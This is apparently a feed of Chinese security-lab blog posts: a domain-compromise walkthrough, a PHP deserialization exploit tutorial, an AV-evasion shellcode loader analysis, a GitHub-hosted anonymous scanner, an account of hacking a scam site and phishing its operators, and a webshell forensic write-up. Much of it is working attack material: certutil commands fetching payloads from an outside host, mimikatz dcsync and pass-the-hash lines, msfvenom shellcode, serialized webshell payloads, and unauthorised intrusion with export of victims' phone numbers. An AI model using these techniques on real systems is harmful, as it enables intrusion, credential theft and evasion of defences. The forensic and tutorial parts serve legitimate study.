此题的关键点在于由r1-r2=e1-e2 (mod n) 推导出两次的倍点x坐标相同,进而推导出两次使用的k值相同,再利用两次签名的r值相减,得到方程解出私钥d。由此看来,使用sm2签名时,必须保证k值的随机性,并且不能重复,一旦重复就可以被计算出私钥。



阅读原文

跳转微信打开

]]> Tue, 31 Aug 2021 12:05:00 +0800 如何打穿几千台机器的内网域渗透?当然是靠 WMI 横向移动了 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247484044&idx=1&sn=9f464f1c2f6ca1e95a012ec903776f9b 如何打穿几千台的内网域渗透?当然是靠 WMI 横向移动了 原创 InBug实验室 2021-08-20 18:15

如何打穿几千台的内网域渗透?当然是靠 WMI 横向移动了

                                                                  

前言


首先是发现了一个 CVE-2017-12149:

访问 http://inbug.org:9090/status 发现有日志,已经被上传了 webshell:

那么就用别人的把:http://inbug.org:9090/jexws4/jexws4.jsp?ppp=whoami

通过 powershell 上线到 Cs:

发现有几百个补丁提权无果:

                    

Metasploit 特权提权


随后把 CS 的 Beacon 互传到了 MSF:
MSF:use exploit/multi/handlerset payload windows/meterpreter/reverse_http
CS:创建监听器windows/foreign/reverse_http执行监听器 spawn msf

然后通过 MSF 的提权检测找到了几个 exp :
run post/multi/recon/local_exploit_suggester

然后利用模块尝试提权:
exploit/windows/local/bypassuac_sdclt

发现用户身份没变,但是当前特权变了:

直接 getsystem 提权到 SYSTEM:

最后利用 SYSYEM 把 shell 传到 Cs:
MSF:backgrounduse exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset session 3run
CS:windows/beacon_http/reverse_http

当前权限就可以抓密码了:

既然当前 beacon 不是 SYSYEM,而且有了本地管理员的账号hash和明文 ,直接本地 psexec 利用本地 administrator 的密码上线:


内网横向移动


这个时候发现就是一个 SYSTEM 的 Beacon 会话了!但是发现没有域管的进程,结果只能另寻他路!然后用抓到的密码去喷射域内其他主机:

然后可以横向 wmi:

 proxychains python3 wmiexec.py -shell-type cmd administrator:password@10.226.0.108 -codec gbk


Bypass 诺顿 AV 上线到 CobaltStrike


之后发现 10.226.0.156 有一个域管的进程:tasklist /v

然后还有诺顿 AV:

使用InScan 的ShllCode免杀功能 做了一下免杀

然后让目标下载我们的 exe,通过certutil 下载我们的 exe:
certutil.exe -urlcache -split -f http://inbug.org:80/download/main.exe

然后运行发现有问题:

exe 编码成 txt:
certutil -encode main.exe main.txt

然后目标下载 txt  然后解码再运行:
certutil.exe -urlcache -split -f http://inbug.org:80/download/main.txt
certutil -decode main.txt main.exe
直接上线到 Cs:

先 getsystem 提权到 SYSYEM:


令牌窃取拿到域管


窃取域管的进程:

随后查询域控IP:
beacon> shell net group "Domain Controllers" /domain[*] Tasked beacon to run: net group "Domain Controllers" /domain[+] host called home, sent: 69 bytes[+] received output:The request will be processed at a domain controller for domain inbug.org.
Group name     Domain ControllersComment        All domain controllers in the domain
Members
-------------------------------------------------------------------------------xxADC01$   192.168.101.4    xxxxN024$ 192.168.0.20      xxxGN042$ 192.168.0.154               xxxGN043$ 192.168.0.19xxxGN052$   192.168.0.14             xxxGN053$    192.168.0.31            xxSERVER1$   10.226.0.150xxPSERVER116$  10.225.241.149          xxSERVER400$  192.168.105.5           xxSERVER401$  192.168.105.6        xxSERVER505$   10.231.1.15        xxSERVER506$    10.232.55.60         xxSERVER600$    10.227.69.108 xxSERVER813$    10.225.240.16         The command completed successfully.

最后直接 dcsync dump 域内全部 hash:
mimikatz lsadump::dcsync /domain:psnet.com /all /csv

5000 多个域用户的 hash 都拿到了,可以进行 pth,随后只要 administrator 的 hash,就可以指定:
mimikatz lsadump::dcsync /domain:inbug.org /user:Administrator

此时利用 ntlm hash 批量 pth 执行命令:
proxychains crackmapexec smb 192.168.0.0/24 -u administrator -H 4a03985f63e4dxxxxxxx -d inbug.org -x "net user"

此时游戏已经结束了!查看了一下域内进行信息;

execute-assembly /Users/saulgoodman/Downloads/SharpHound.exe -c all

好家伙,2600多机器,5000多个用户,就到这吧。

阅读原文

跳转微信打开

]]> Fri, 20 Aug 2021 18:15:00 +0800 PHP反序列化漏洞浅入浅出 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247483958&idx=1&sn=80351dad7888c08ae96ad593c8f4c1e8 序列化与反序列化机制本身并无问题,但应用程序对于用户输入数据(不可信数据)进行了反序列化处理,使反序列化生成了非预期的对象,在对象的生成过程中可能产生攻击行为。 原创 InBug实验室 2021-08-06 18:35

序列化与反序列化机制本身并无问题,但应用程序对于用户输入数据(不可信数据)进行了反序列化处理,使反序列化生成了非预期的对象,在对象的生成过程中可能产生攻击行为。

                                                                                                    

序列化与反序列化


序列化就是将对象的状态信息转换为可存储或传输的形式的过程;反序列化将可存储或传输的形式的过程恢复为对象的过程。面向对象的语言都存在序列化和反序列化操作,如C#、python、java、php、JavaScript等。
为什么需要反序列化呢?一是方便传输,服务端把数据序列化,发送到客户端,客户端把接收到的数据反序列化后对数据进行操作,完成后再序列化发送到服务端,服务端再反序列化数据后对数据进行操作;二是方便存储,将内存中的对象状态保存至文件或数据库中,供之后使用。
序列化与反序列化机制本身并无问题,但应用程序对于用户输入数据(不 可信数据)进行了反序列化处理,使反序列化生成了非预期的对象,在对象的产生过程中可能产生攻击行为。


PHP序列化


PHP序列化后得到的字符串存储的信息仅包含对象的属性,并不包含类中的函数(方法)。

  • 代码

<?phpclass Student{    public $name;    public $stuid;    public $age;    function __construct($name,$stuid){        $this->name=$name;        $this->stuid=$stuid;    }     function hello(){        echo("Hello,I'm $this->name.");    }}
$stu1=new Student('Alice',1);$stu2=new Student('Bob',2);$stu1->hello();$stu2->hello();echo(serialize($stu1));echo(serialize($stu2));

  • 执行结果

kali@kali:/tmp$ php student.php Hello,I'm Alice.Hello,I'm Bob.O:7:"Student":3:{s:4:"name";s:5:"Alice";s:5:"stuid";i:1;s:3:"age";N;}O:7:"Student":3:{s:4:"name";s:3:"Bob";s:5:"stuid";i:2;s:3:"age";N;}
 从执行结果可以看出O:7:"Student"中O代表object,7是对象名称长度,"Student"是O对应的值。php序列化后的格式为”类型:长度:值“,后面再将O:7:"Student"看作一个整体作为Student类的对象类型,后面的3为长度,最后的花括号中存在3对属性。
由于PHP序列化后得到的字符串存储的信息仅包含对象的属性,所以可以去除函数进行序列化。特定环境下去除函数后才能得到你想要的。

  • 代码

<?phpclass Student{    public $name;    public $stuid;    public $age;}
$stu1=new Student();$stu1->name='Alice';$stu1->stuid=1;$stu2=new Student();$stu2->name='Bob';$stu2->stuid=2;echo(serialize($stu1));echo("\n");echo(serialize($stu2));echo("\n");

  • 执行结果

kali@kali:/tmp$ php student_nofunc.php O:7:"Student":3:{s:4:"name";s:5:"Alice";s:5:"stuid";i:1;s:3:"age";N;}O:7:"Student":3:{s:4:"name";s:3:"Bob";s:5:"stuid";i:2;s:3:"age";N;}
可见,只要class名称、属性及属性值相同,序列化结果相同,与成员函数无任何关系。
                       

PHP反序列化


PHP反序列化是序列化的逆过程,将序列化后的字符串还原成PHP对象。

  • 代码

<?phpclass Student{    public $name;    public $stuid;    public $age;    function __construct($name,$stuid){        $this->name=$name;        $this->stuid=$stuid;    }     function hello(){        echo("Hello,I'm $this->name.\n");    }
}
$stu=unserialize('O:7:"Student":3:{s:4:"name";s:5:"Alice";s:5:"stuid";i:1;s:3:"age";N;}');$stu->hello();echo $stu->name;echo "\n";

  • 执行结果

kali@kali:/tmp$ php student_sleep.phpHello,I'm Alice.Alice
可见代码中$stu对象由反序列化得到,反序列化的本质就是为对象属性赋值。


                                                                                                    

PHP反序列化漏洞


反序列化时,我们只能控制对象的的属性值,不能直接控制其执行某个特定的函数或语句,无法直接造成危害。PHP存在一些魔术函数,特定条件下被动触发执行。我们可以构造属性值为特定对象,创造环境使其触发执行一些包含危险操作的魔术函数执行。魔术函数以双下划线开头。
PHP中常见的魔术函数和触发条件如下:
魔术函数
触发条件
__construct()使用new关键字创建对象时
__destruct()对象被销毁时包括但不限于程序正常结束
__call()
调用对象的一个不可访问方法时
__callStatic()
使用类名调用一个不可访问的静态方法时
__get()
读取不可访问属性的值时
__set()
给不可访问属性赋值时
__isset()
当对不可访问属性调用 isset() 或 empty() 时
__unset()
当对不可访问属性调用 unset() 时
__sleep()要序列化还未序列化时
__wakeup()反序列化完成后自动调用
__serialize()要序列化还未序列化时调用,与__sleep()同时存在时__sleep()会被忽略不调用
__unserialize()反序列化完成后自动调用,与__wakeup()同时存在时__wakeup()会被忽略不调用
__toString()对象被当作字符串时,如字符串拼接、被echo等
__invoke()对象被当作函数调用时

  • 代码

<?phpclass Student{    public $name;    public $stuid;    public $age;    function __construct($name,$stuid){        $this->name=$name;        $this->stuid=$stuid;    }     function hello(){        echo("Hello,I'm $this->name.\n");    }    function __get($value){        echo "$value get error.\n";        return("unknow $value.\n");    }}
$stu=new Student('Alice',1);echo $stu->sex;

  • 执行结果

kali@kali:/tmp$ php magic.php sex get error.unknow sex.
__get函数在尝试访问$stu->sex触发执行。看如下示例,进行简单的反序列化利用。

  • 代码

<?phpclass Student{    public $name;    public $stuid;    public $age;    function __construct($name,$stuid){        $this->name=$name;        $this->stuid=$stuid;    }     function hello(){        echo("Hello,I'm $this->name.\n");    }    function __get($value){        echo "$value get error\n";        return("unknow $value.\n");    }    function __toString(){        system($this->command);        return("\nok\n");    }}
$stu=unserialize($_REQUEST('un'));$stu->hello();

  • 分析

由于unserialize函数从请求中获取un参数,用户可控制用于反序列化的字符串。重心放在寻找可利用的魔术函数上。我们很容易注意到类中的__toString函数执行了危险操作,需要使其触发,就必须要有地方将该对象当作字符串使用。反序列化后只调用了hello(),hello中将自身的name属性进行字符串拼接,如果该name属性的值是Student对象,那将触发该对象的___toString函数执行。所以我们创建一个Student对象$stu1,使其属性$command为我们想执行的命令,$stu1对象被当作字符串使用时将执行$command。然后创建一个Student对象$stu2,使其name属性为$stu1,在执行$stu2的hello函数时就会将$stu1当作字符串进行拼接触发$stu1的__toString函数。exp代码如下:

  • exp

<?phpclass Student{    public $name;    public $stuid;    public $age;    function __construct($name,$stuid){        $this->name=$name;        $this->stuid=$stuid;    }     function hello(){        echo("Hello,I'm $this->name.\n");    }    function __get($value){        echo "$value get error\n";        return("unknow $value.\n");    }    function __toString(){        system($this->command);        return("\nok\n");    }}
$stu1=new Student('Alice',1);$stu1->command='ifconfig';$stu2=new Student($stu1,2);echo serialize($stu2);

  • 执行结果

kali@kali:/tmp$ php unser_exp.phpO:7:"Student":3:{s:4:"name";O:7:"Student":4:{s:4:"name";s:5:"Alice";s:5:"stuid";i:1;s:3:"age";N;s:7:"command";s:8:"ifconfig";}s:5:"stuid";i:2;s:3:"age";N;}

构造url:

http://127.0.0.1/unser_vul.php?un=O:7:"Student":3:{s:4:"name";O:7:"Student":4:{s:4:"name";s:5:"Alice";s:5:"stuid";i:1;s:3:"age";N;s:7:"command";s:8:"ifconfig";}s:5:"stuid";i:2;s:3:"age";N;}

  • 访问结果:

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 192.168.138.1  netmask 255.255.255.0  broadcast 192.168.138.255        inet6 fe80::c49:bff:2a44:7c3  prefixlen 64  scopeid 0xfd<compat,link,site,host>        ether 00:50:56:c0:00:01  (Ethernet)        RX packets 0  bytes 0 (0.0 B)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 0  bytes 0 (0.0 B)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 1500        inet 127.0.0.1  netmask 255.0.0.0        inet6 ::1  prefixlen 128  scopeid 0xfe<compat,link,site,host>        loop  (Local Loopback)        RX packets 0  bytes 0 (0.0 B)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 0  bytes 0 (0.0 B)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
Hello,I'mok.
                                                                                                    

实例


该题为2020年云南省网络安全大赛中一个web环境,里面存在多个漏洞。该反序列化后门仅为其中之一。本文仅对该后门进行分析。
后门地址:/content/backup/nbc.php
<?phperror_reporting(0);
class Demo1{  private $a;  function test(){    echo $this->a;  }}
class Demo2{  private $cmd;  function a(){    eval($this->cmd);  }
  function __toString(){    $this->a();    return 'ok';  }}
$d = unserialize($_GET['s']);$d->test();

  • 分析

$d->test()说明$d可能是Demo1的实例,执行Demo1中的test()时echo自己的$a的值,若$a不为字符串,将触发调用$a->__toString(),若$a为Demo2的实例,$a->__toString()调用$a->a(),执行eval($a->cmd);。   
构造对象使得$s为Demo1的实例,$s的a属性为Demo2的实例 $t,并使$t的属性cmd为自定义的php代码,如一句话木马eval($_REQUEST[inbug]);。 
由于Demo1的a属性和Demo2的cmd属性均为私有(private)属性,生成payload时添加函数来给私有属性赋值。此处添加构造函数(__construct),也可定义其他函数或者在class中赋值。
:私有属性序列化后会产生空字节(%00),所以根据需要选择不同编码方式,不编码会导致空字节丢失,进制利用失败。

  • 编写利用代码 exp.php

<?phpclass Demo1{  private $a;  function __construct($arg){    $this->a=$arg;  }  function test(){    echo $this->a;  }}
class Demo2{  private $cmd;  function __construct($arg){    $this->cmd=$arg;  }  function a(){    eval($this->cmd);  }
  function __toString(){    $this->a();    return 'ok';  }}
$t=new Demo2('eval($_REQUEST[inbug]);');$s=new Demo1($t);$d = serialize($s);echo(urlencode($d));


  • 执行结果

root@kali# php exp.phpO%3A5%3A%22Demo1%22%3A1%3A%7Bs%3A8%3A%22%00Demo1%00a%22%3BO%3A5%3A%22Demo2%22%3A1%3A%7Bs%3A10%3A%22%00Demo2%00cmd%22%3Bs%3A23%3A%22eval%28%24_REQUEST%5Binbug%5D%29%3B%22%3B%7D%7D

  • 蚁剑连接

链接:/content/backup/nbc.php?s=O%3A5%3A%22Demo1%22%3A1%3A%7Bs%3A8%3A%22%00Demo1%00a%22%3BO%3A5%3A%22Demo2%22%3A1%3A%7Bs%3A10%3A%22%00Demo2%00cmd%22%3Bs%3A23%3A%22eval%28%24_REQUEST%5Binbug%5D%29%3B%22%3B%7D%7D连接密码:inbug
                                                                                                    

总结


PHP反序列化利用需要两个条件,一是用于反序列化的字符串用户可控,二是服务端环境中有可利用的class和魔术函数。

阅读原文

跳转微信打开

]]> Fri, 06 Aug 2021 18:35:00 +0800 【招聘】Go安全开发工程师 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247483958&idx=2&sn=5c0923ceffc228c8c1b3f272cf40deae 实验室安全开发岗位等你来战! 2021-08-06 18:35

实验室安全开发岗位等你来战!


                                                                     

岗位要求


1、2年以上go开发工作经验,基础扎实,有完整的项目经验;

2、熟练掌握go协程,channel和锁,对高并发有正确的理解;

3、有平台开发经验,对restful概念有清晰的理解,至少掌握gin/beego中一种web框架;

4、熟悉xml/json/protobuf等网络通信技术和数据交换格式;

5、良好的编码习惯和清晰的编程思路;

6、熟悉tcp/ip、http等协议,熟练掌握socket网络编程,有rpc微服务开发相关经验;

7、熟悉sql语言,熟练掌握mysql,sqlite,redis等数据库及相关工具;

8、具备安全开发经验优先


base:昆明

邮箱:admin@inbug.org

微信:whoami_in

阅读原文

跳转微信打开

]]> Fri, 06 Aug 2021 18:35:00 +0800 InCloud GitHub云上扫描器 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247483942&idx=1&sn=acc87d9ff5fd30be567f302eae5b1656 使用GitHub云扫描,实现ip隐藏、防溯源、云上自动化信息收集。 原创 InBug实验室 2021-07-19 19:18

使用GitHub云扫描,实现ip隐藏、防溯源、云上自动化信息收集。

                                                    

描述


使用GitHub云扫描,实现ip隐藏、防溯源、云上自动化信息收集。



工具定位


运行于GitHub Actions 的仓库中自动化、自定义和执行软件开发工作流程,可以自己根据喜好定制功能,InCloud已经为您定制好了八种针对网段和域名的不同场景的信息收集与漏洞扫描流。


功能:

  • PortScan-AllPort 对单IP文件列表进行全端口扫描,输出可用Web服务标题。

  • PortScan-AllPort-Xray-Dirscan 对单IP文件列表进行全端口扫描,输出可用Web服务标题,对Web服务进行Xray爬虫爬取与漏洞扫描,对Web服务进行Ffuf目录递归扫描。

  • PortScan-Top1000 对单C段IP列表进行Top1000端口扫描,输出可用Web服务标题。

  • PortScan-Top1000-Xray 对单C段IP列表进行Top1000端口扫描,输出可用Web服务标题,对Web服务进行Xray爬虫爬取与漏洞扫描。

  • PortScan-Top1000-Dirscan 对单C段IP列表进行Top1000端口扫描,输出可用Web服务标题,对Web服务进行Ffuf目录递归扫描。

  • SubDomain-Portscan-Vulnscan 对域名进行子域名枚举与接口查询,对查询的子域名进行Top1000端口扫描,输出可用Web服务标题,对Web服务进行Nuclei漏洞扫描。

  • SubDomain-Portscan-Xray 对域名进行子域名枚举与接口查询,对查询的子域名进行Top1000端口扫描,输出可用Web服务标题,对Web服务进行Xray爬虫爬取与漏洞扫描。

  • SubDomain-Portscan-Dirscan 对域名进行子域名枚举与接口查询,对查询的子域名进行Top1000端口扫描,输出可用Web服务标题,对Web服务进行Ffuf目录递归扫描。


使用方法:

  • 1.将项目fork到自己的github.
  • 2.修改流程文件(.github/workflows/incloud.yaml)里的 git config --local user.email 与 git config --global user.name 改成自己的邮箱与自己的ID(用于报告输出)
  • 3.修改input目录的扫描目标,使用action标签进行在线编译。
    4.GitHub提供六小时的容器使用时长,扫描结束后,扫描结果会自动上传到自己fork的output文件夹下。





    项目地址:
    github.com/inbug-team/InCloud



阅读原文

跳转微信打开

]]> Mon, 19 Jul 2021 19:18:00 +0800 不会免杀?看我异或加密如何做到 VT 全免杀 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247483912&idx=1&sn=52c25b5966ce9644f6f9cace12c838c9 原创 InBug实验室 2021-07-09 19:35

                                                                                                                     

前言


最近逛 github 的时候发现一个 C 的免杀项目,项目介绍中,作者只利用了动态加载 windows api ,和异或加密的方法就达到了在 antiscan.me 上全免杀的效果:

于是,我怀着一颗学徒之心,研究了一下这个项目,下面是我在  vt 上的测试结果:



                                                                                                                     

使用方法


需要的环境:python3 、C++编译环境(我测试的时候是用VS2017编译的,如果是Kali Linux需要使用apt-get install mingw-w64*命令安装相关编译环境)。

先利用msf生成shellcode(这里为了方便测试直接生成弹计算器的shellcode)

msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f raw -o beacon.bin


然后运行 python charlotte.py:


生成后的dll文件就是需要的恶意文件了,执行方法 rundll32 charlotte.dll,随机函数名
具体的命令在运行charlotte.py脚本后会显示,如下图:

Bypass AV 无压力。
                                                                     

源码分析


这个项目一共分为两个部分,大概的思路就是创建一个模板的C++文件,然后利用python对字符串的处理,来解决C++文件中windows api的混淆和 shellcode 的加密。(其实很简单,还是老一套),项目目录结构如下图:


首先,我们来看下C++模板文件的关键代码:

    // If all good, launch the payload    if ( rvba != 0 ) {                XOR((char *) createthread, ct_len, ct_key, sizeof(ct_key));                pCreateThread = GetProcAddress(GetModuleHandle("kernel32.dll"), createthread);            thba = pCreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);                XOR((char *) waitforsingleobject, wfso_len, wfso_key, sizeof(wfso_key));            pWaitForSingleObject = GetProcAddress(GetModuleHandle("kernel32.dll"), waitforsingleobject);            pWaitForSingleObject(thba, -1);    }    return TRUE;    }

可以看到,这个项目并没有用什么很复杂的技巧,模板C++的代码流程大概是这样的:
申请内存空间——> 更改内存空间属性 ——> 创建线程——> 执行shellcode
不过在调用的函数的时候,都采用了使用GetProcAddress动态获取函数的方式,这样的方法应该是让大部分杀软无法通过导入表中的函数去判断程序的黑白。

接下来,我们看py文件的内容:
第一个部分,读取shellcode内容,还有准备需要混淆的api名字,获取key随机字符串。

第二部分,将shellcode和相关api字符串通通用异或进行混淆:


第三部分,将混淆后的字符串和混淆用的key替换模板中文件的对应部分:


第四部分,用g++生成目标文件,清除中间产生的cpp文件:


                   

总结


这个项目免杀的原因大概有以下几点:

  1. VT的多引擎查杀是静态查杀,或者说由于生成的是动态链接库文件,使得杀毒引擎只能使用启发式查杀和动态查杀去判断黑白。

  2. 模板中的字符串赋值类似char buf[] = {'h','e','l','l','o'};。这样让字符串存在于text段,而非常见的rdata段,字符串数据和代码混在一起,让杀毒引擎难以快速识别里面的字符串。(之所以说难以识别,是因为用ida之类的软件还是能看出来的,但是那样要求去用反汇编引擎反编译,识别语法树之类的,操作时间太长,为了平衡杀毒效率和杀毒准确性,一般会在云平台上运行)

  3. 模板中调用windows api的使用都是动态加载,而且用字符串混淆的方式隐藏了api函数,而且每个字符串的key都不一样,导致杀毒引擎没法识别出本来的字符串,进一步识别。
    总得来说,这个项目在静态查杀方面已经做到了免杀当前所有杀毒引擎,是个挺不错得项目。


由于比较懒,并没有按照项目推荐去下g++环境踩坑,以下是在vs2017上存在得一些坑点,大家踩坑的时候自行斟酌。

这个项目的python脚本对g++编译过程是隐藏的,所以一些编译时可能有的错会难以发现。如果发现运行脚本后没有自动生成dll文件的话,建议从编译的步骤开始自个手动编。像我就将脚本移除cpp文件的部分注释了,然后手动编译(结果发现没环境,最后看到作者有写要下环境~)

模板c++文件中对于类型转化的报错,项目中源码如下图,在vs2017上编译的话是会报类型不匹配的错的需要用到类型强转:


改后的源码:

模板c++文件中对字符串的处理并没有加结束符,会导致解密后运行报错,所以需要在字符串末尾加上 0x00,就像这样:


当然,可以在脚本里面直接加:

模板文件中的函数类型没有赋值,所以也会报错。需要加上类型说明和强制转换:

最后,祝大家上线如回家,免杀如喝水!!

参考:https://github.com/9emin1/charlotte



阅读原文

跳转微信打开

]]> Fri, 09 Jul 2021 19:35:00 +0800 针对一次非法资金盘的攻击 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247483887&idx=1&sn=e4e044ec148934fd02650dd4031c67b3 迂回渗透非法资金盘,成功落地诈骗团伙IP。 原创 InBug实验室 2021-07-03 20:35

迂回渗透非法资金盘,成功落地诈骗团伙IP。


                                                                                                        


什么是“杀猪盘”?


“杀猪盘”是“诈骗者”自己起的名字。诈骗分子准备好人设、交友套路等“猪饲料”,将社交平台称为“猪圈”,在其中寻找被他们称为“猪”的诈骗对象。通过建立恋爱关系,即“养猪”。最后骗取钱财,即“杀猪”。说白了就是诈骗分子和你先搞好关系,然后以“朋友”、“恋人”的关系去诱导你充钱到赌博网站,等你回过头来的时候他们已经销声匿迹了。

                                                                                                        

针对一次非法资金盘的攻击


最初看到朋友圈各种晒资金APP收入信息截图,怀疑是被骗了,好意提醒过她,结果之后就收到朋友的信息求助:

首先下载 App 去了解一下界面是什么样的:

发现这应该是一个 H5 打包封装的 app ,制定一下攻击流程:要么先找源码进行白盒测试要么就进行黑盒测试!
常见的获取源码的平台有:互站网,源码之家,站长下载。不过这种类型的源码居多:

互站网针对这种类型的源码非常的多,不过这些源码都是基于 tp 框架 cms 二次开发的系统,

大致内容应该都是一样的!

从互站网发现了一套源码,询问客服能不能给一个演示站点。客服晚上发了一个演示站点和测试账户进行测试:

看起来和目标站点大致相同:

跟目标站点对比了一下,功能大致相同,出处内容不大。
针对演示站点的弱点排查进行后台模糊测试:

此处看到一处上传点:

不过上传限制了白名单上传,这个地方丢弃掉。在后台翻了一个遍,基本是白名单控制无法突破。
后续来到前台,看到有提交任务出有上传的功能:

先抓包分析查看:

于是凭借经验尝试修改“image/jpeg”为“text/php”试一试:

提交成功去看看能不能拿到shell:


前台没有图片链接信息,去后台看看:


同样也没有链接信息,可能是上传方式有问题,再重新试试:

这次把jpeg改成PHP 再试试:

去后台看看发现有了地址:    

成功图片上传拿到 Webshell:



拿到 webshell 后把源码打包,之后进行代码审计,这是当前源码目录结构:


为了节约时间决定先找 getshell 漏洞,再找 sql 注入或者其他漏洞,因为这种漏洞能够快速拿到目标网站权限,通过代码审计看到会员中心有一处文件上传:

跟进 upload_base64 方法:

分析编码过来的base64流存不存在 data image  先前把image 改成了 text 所以才没有上传成功!这是目标站点页面信息:

通过审计出来的 0day 成功拿到网站权限:

拿到了网站权限于是就想钓鱼幕后杀猪盘黑手,通过利用Flash钓鱼手段获取管理员PC终端权限。
先是伪造了一个 Flash 官网:

然后诈骗团伙登陆后台后,会弹出升级Flash。
点击就会下载带有后门的恶意文件:

Flash 钓鱼原理就是这样,随后通过漫长等待目标终于上钩:

最终锁定了嫌疑人的 IP 和社交信息:

IP:118.xx.xx.43地区:安徽 芜湖个人电脑登录过的QQ号:2283*****
通过大数据综合关联分析以及诈骗团伙终端资料,得出一些历史密码及社交信息。
在此已获取到嫌疑人所有社交信息,获取到目标宝塔权限,邮箱等...

进入数据库,将受害人手机号码导出,分析受害者分布地区:


可见全国各地都有不同的人上钩,在这里跟大家说一下一定要远离资金盘,远离赌博网站,这些都是“杀猪刀”,如果你”上钩“了,你也变成“猪”了!

阅读原文

跳转微信打开

]]> Sat, 03 Jul 2021 20:35:00 +0800 一次入侵溯源分析,通过流量完整还原黑客攻击手法 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247483886&idx=1&sn=1ccac5a3eec365c216077e99c7b1582b 中间件日志和webshell被删除的情况下,通过安全设备日志和全流量日志还原攻击过程。 原创 InBug实验室 2021-07-02 18:30

中间件日志和webshell被删除的情况下,通过安全设备日志和全流量日志还原攻击过程。


背景概述


2021年6月,某单位系统关键图片被篡改,网站疑似遭到入侵。

获取信息


从安全感知系统中导出近两天攻击行为日志,经分析处理共计1097条。

从全流量系统中导出遭受攻击当天流量包,经分析处理共计101,801,984字节(97MB)数据包。



入侵过程还原


由于图片被篡改,访问网页复制图片链接查看图片文件名。然后思考篡改图片大致流程为先下载图片,然后P图加上水印,然后再上传替换服务器上的图片。从攻击行为日志中检索图片文件名"logo.gif",得到如下两条日志。可获知/August/August.jsp操作了这张图。(有经验的大佬可能通过这两行日志就已经看出来August.jsp是菜刀马了)

攻击者尝试攻击:x.x.x.x:9090/August/August.jsp,攻击代码为:a=F&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif攻击者尝试攻击:x.x.x.x:9090/August/August.jsp,攻击代码为:a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif
接下来从流量中检索 August.jsp,第一次出现的位置前后数据包可能存在上传马的数据包,使用wireshark打开数据包检索http contains "August.jsp" 得到源目的IP,做进一步检索,查看第一条追踪http流。

URL解码后得到 August.jsp 文件内容。(显然,August.jsp为菜刀马)

过滤 http.request.method=="POST" and http.request.uri =="/August/August.jsp",根据流量中请求的POST参数一步一步还原攻击全过程。提取出请求如下:(很多环境中没有记录全流量,可以从能记录post参数的安全设备中导出,如WAF)

要理解这些参数对应的操作,需分析菜刀马。粗略分析,参数中的a=B中的a是菜刀马的密码,B则会调用菜刀马中的BB函数,a=M则意味着会调用菜刀马的MM函数,以此类推。接下来分析菜刀马的所有XX函数执行什么操作,分析整理如下:

a=A     //列出根目录a=B     //列出指定目录文件a=C     //读取文本文件a=D     //写入文本文件a=E     //删除文件或文件夹a=F     //下载文件a=G     //将16进制字符串写为文件a=H     //二进制文件复制a=I     //文件重命名a=J     //创建文件夹a=K     //修改时间戳a=L     //从指定链接下载文件a=M     //读取命令执行结果a=N     //连接数据库a=O     //创建数据库表a=P     //读取数据库列a=Q     //读取数据库数据
分析完菜刀马,我们就能很容易地通过流量中对马的请求参数来还原出攻击步骤,中间若干浏览目录的操作已省略。


请求参数分析结果
a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bid%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D执行命令[id]
a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bnetstat+-ano%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D执行命令[netstat -ano]
a=H&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2FAugust.jsp&z2=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2FAugust.jsp复制文件/usr/local/jboss/server/default/./deploy/management/August.war/August.jsp到/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war/August.jsp
a=I&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2FAugust.jsp&z2=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2Ftest.jsp将/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war/August.jsp重命名为test.jsp
a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2Ftest.jsp&z2=2008-07-19+02%3A21%3A04将/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war/test.jsp的最后修改时间改为2008-07-19  02:21:04
